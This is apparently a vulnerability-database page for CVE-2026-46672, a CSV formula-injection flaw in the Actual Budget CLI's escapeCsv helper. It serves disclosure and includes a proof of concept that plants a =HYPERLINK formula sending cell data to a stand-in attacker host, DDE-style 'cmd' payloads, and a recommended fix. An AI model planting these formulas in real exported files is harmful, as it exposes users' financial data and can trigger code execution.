Skip to main content

Actual Budget CLI CVE-2026-46672

MEDIUM
Improper Neutralization of Formula Elements in a CSV File (CWE-1236)
2026-06-22 https://github.com/actualbudget/actual GHSA-7gh7-258j-4mpq
4.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.6 MEDIUM
AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
4.6 MEDIUM

AV:L reflects local file-open exploitation trigger; PR:L as attacker requires budget write access; UI:R for victim spreadsheet open; S:C for scope crossing into spreadsheet application; no availability impact.

3.1 AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:L/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 22:29 vuln.today
Analysis Generated
Jun 22, 2026 - 22:29 vuln.today

DescriptionGitHub Advisory

Summary

@actual-app/cli ships a hand-rolled CSV serializer in packages/cli/src/output.ts (used whenever the global --format csv option is passed) whose escapeCsv helper only handles RFC 4180 delimiter/quote/newline escaping. It does not neutralize the standard CSV formula-injection prefixes (=, +, -, @, \t, \r). Any CLI command that streams an object array containing user-controlled strings - transactions list, accounts list, payees list, categories list, tags list, category-groups list, rules list, schedules list, query - will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (=HYPERLINK(...), =WEBSERVICE(...)) and arbitrary formula execution.

This is a distinct variant of the formula-injection surface in packages/loot-core/src/server/transactions/export/export-to-csv.ts (which uses csv-stringify and would need a separate cast option fix) - they are different files, different packages, and different serializers. Fixing one does not fix the other.

Details

Vulnerable code

packages/cli/src/output.ts:98-103:

ts
function escapeCsv(value: string): string {
  if (value.includes(',') || value.includes('"') || value.includes('\n')) {
    return '"' + value.replace(/"/g, '""') + '"';
  }
  return value;
}

The helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 *parsing* but irrelevant to spreadsheet *formula evaluation*. CSV double-quoting is invisible to Excel/Calc/Sheets - the unquoted cell value =HYPERLINK("http://attacker/?d="&B2,"Click") is still parsed as a formula by the spreadsheet, even when wrapped as "=HYPERLINK(""http://attacker/?d=""&B2,""Click"")" on disk.

Data flow to the sink

  1. The global --format option is registered at packages/cli/src/index.ts:53-57 with choices(['json','table','csv']) and applies to every subcommand.
  2. List/query subcommands invoke printOutput(data, format) (output.ts:105-107), which routes format === 'csv' to formatCsv (output.ts:71-96).
  3. For each row, every column is run through formatCellValue (output.ts:21-26):
ts
   function formatCellValue(key: string, value: unknown): string {
     if (isAmountValue(key, value)) {
       return (value / 100).toFixed(2);
     }
     return String(value ?? '');
   }

Only the fixed AMOUNT_FIELDS set (amount, balance, budgeted, etc.) gets numeric coercion. User-controlled string fields - payee.name, account.name, category.name, notes, tag names, rule descriptions, schedule names - are passed verbatim to escapeCsv.

  1. escapeCsv returns the value unmodified unless it contains ,, ", or \n. A payload such as =1+1, @SUM(...), +1+cmd|'/c calc'!A0, or -2+3+cmd|'/c calc'!A0 therefore lands in the output as a leading-character formula.

Exploitability conditions

  • The CLI is installed and used by the victim (@actual-app/cli is published with "bin": { "actual": "./dist/cli.js", "actual-cli": "./dist/cli.js" }).
  • The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:
  • Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).
  • Sending the victim a crafted OFX/QIF/CSV import file.
  • API write access (e.g., over a compromised sync session).
  • The victim runs actual <list-cmd> --format csv > out.csv and opens out.csv in a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.

There are no mitigations in the code path: no allowlist, no sanitizer, no cast option, no warning, and the CLI is shipped to end users via npm.

PoC

Setup (one-time - choose any user-controlled field; payee shown):

bash
# Inject via the CLI's own write path (or via OFX/QIF/CSV import, or shared sync):
actual transactions add \
  --account "$ACCOUNT_ID" \
  --data '[{"payee_name":"=HYPERLINK(\"http://attacker.evil/leak?d=\"&B2,\"Bank refund\")","date":"2026-01-01","amount":10000}]'

Trigger (victim runs):

bash
actual transactions list --account "$ACCOUNT_ID" --start 2026-01-01 --end 2026-12-31 --format csv > out.csv
cat out.csv

Observed output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):

id,date,amount,payee,notes,category,account,cleared,reconciled
abc...,2026-01-01,100.00,"=HYPERLINK(""http://attacker.evil/leak?d=""&B2,""Bank refund"")",,,Checking,false,false

Open out.csv in Excel / LibreOffice Calc / Google Sheets → the payee cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (B2 = the date, but trivially adjustable to any cell) to the attacker.

Minimal-payload variants that bypass escapeCsv entirely (no ,, ", or \n → no quoting at all):

  • Payee name =1+1 → cell shows 2.
  • Payee name @SUM(1+1) → cell shows 2.
  • Payee name +1+1 → cell shows 2.
  • Payee name -2+3 → cell shows 1.

The same applies to other list commands sharing the global --format option:

bash
actual accounts list   --format csv
# account.name
actual payees   list   --format csv
# payee.name
actual categories list --format csv
# category.name
actual tags list       --format csv
actual category-groups list --format csv
actual rules list      --format csv
actual schedules list  --format csv
actual query "..."     --format csv

Verified by reading escapeCsv (packages/cli/src/output.ts:98-103): the only escape triggers are ,, ", \n, and even when triggered the leading character is preserved.

Impact

  • Data exfiltration in the victim's spreadsheet context via =HYPERLINK(...), =WEBSERVICE(...), =IMPORTXML(...) (Sheets), =IMPORTDATA(...) (Sheets) - typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim's financial data (account names, balances, transactions in adjacent cells) is the natural exfil target.
  • Arbitrary formula execution in the victim's spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).
  • Trust-boundary crossing: financial data the victim assumes is "exported" becomes attacker-controlled active content. The CLI is the victim's own trusted tool; users do not expect actual transactions list --format csv to produce a file that runs code.

Blast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet - but both are realistic for a personal-finance app whose primary export workflow is "open in Excel".

Recommended Fix

Neutralize formula-trigger prefixes in escapeCsv *before* the existing RFC 4180 quoting. Example:

ts
// packages/cli/src/output.ts
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;

function escapeCsv(value: string): string {
  // Neutralize spreadsheet formula prefixes (CWE-1236).
  if (FORMULA_TRIGGERS.test(value)) {
    value = "'" + value;
  }
  if (value.includes(',') || value.includes('"') || value.includes('\n')) {
    return '"' + value.replace(/"/g, '""') + '"';
  }
  return value;
}

The leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in packages/loot-core/src/server/transactions/export/export-to-csv.ts by passing a cast option to csv-stringify that prepends ' to any string starting with a formula trigger - the two sites are independent and both must be patched.

AnalysisAI

CSV formula injection in @actual-app/cli versions prior to 26.6.0 allows an attacker who can write user-controlled strings into an Actual Budget database to execute arbitrary spreadsheet formulas when the victim exports data using the --format csv flag and opens the resulting file in Excel, LibreOffice Calc, or Google Sheets. The vulnerable escapeCsv helper in packages/cli/src/output.ts neutralizes only RFC 4180 delimiters and quotes but does not strip formula-trigger prefixes (=, +, -, @, tab, CR), meaning payloads in payee names, account names, categories, notes, or tags survive into the CSV output unchanged. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker plants formula string in budget field via sync/import
Delivery
Victim exports data with --format csv
Exploit
escapeCsv preserves formula prefix unchanged
Execution
Victim opens local CSV in Excel/Sheets
Persist
Spreadsheet evaluates formula
Impact
Financial data exfiltrated to attacker endpoint

Vulnerability AssessmentAI

Exploitation The attack requires three concurrent conditions: (1) The attacker must have the ability to write a formula-prefixed string into a user-controlled field in the victim's budget database - realistic vectors include co-user or collaborator access on a synced budget, compromise of a shared sync server session, or crafting a malicious OFX/QIF/CSV import file that the victim ingests. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS 3.1 score is 4.6 (Medium) with vector AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with write access to a shared Actual Budget sync server - or who sends the victim a crafted OFX/QIF/CSV import file - sets a payee name to `=HYPERLINK("http://attacker.evil/leak?d="&B2,"Bank refund")`. When the victim later runs `actual transactions list --format csv > out.csv` and opens `out.csv` in Excel or Google Sheets, the payee cell renders as a clickable hyperlink; clicking it (or automatic evaluation in WEBSERVICE/IMPORTXML configurations) exfiltrates adjacent cell content - such as dates, amounts, or account names - to the attacker's server. …
Remediation Upgrade `@actual-app/cli` to version 26.6.0 or later, which is the vendor-confirmed patched release per the npm package advisory data. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2025-54782 CRITICAL POC
9.4 Aug 02

Nest is a framework for building scalable Node.js server-side applications. Rated critical severity (CVSS 9.4), this vul

CVE-2026-41679 CRITICAL POC
10.0 Apr 23

Remote unauthenticated attackers achieve full code execution on Paperclip AI orchestration servers (versions prior to 20

CVE-2026-21877 CRITICAL POC
9.9 Jan 08

n8n workflow automation (through 1.121.2) allows authenticated users to execute arbitrary code via the n8n service, with

CVE-2026-41264 CRITICAL POC
9.2 Apr 21

## Abstract Trend Micro's Zero Day Initiative has identified a vulnerability affecting FlowiseAI Flowise. ## Vulnerabi

CVE-2026-21858 CRITICAL POC
10.0 Jan 08

n8n workflow automation (1.65.0 to 1.121.0) allows unauthenticated file access through form-based workflows. A critical

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2026-22686 CRITICAL POC
10.0 Jan 14

enclave-vm JavaScript sandbox (before 2.7.0) has a critical sandbox escape. When a tool invocation fails, a host-side Er

CVE-2026-42043 CRITICAL POC
10.0 Apr 24

NO_PROXY protection bypass in Axios HTTP client (versions 1.0.0-1.15.0 and ≤0.31.0) lets an attacker who controls a requ

CVE-2026-47668 CRITICAL POC
10.0 Jun 05

Unauthenticated remote code execution in DbGate (npm package dbgate-serve, versions <= 7.1.8) lets remote attackers exec

Share

CVE-2026-46672 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy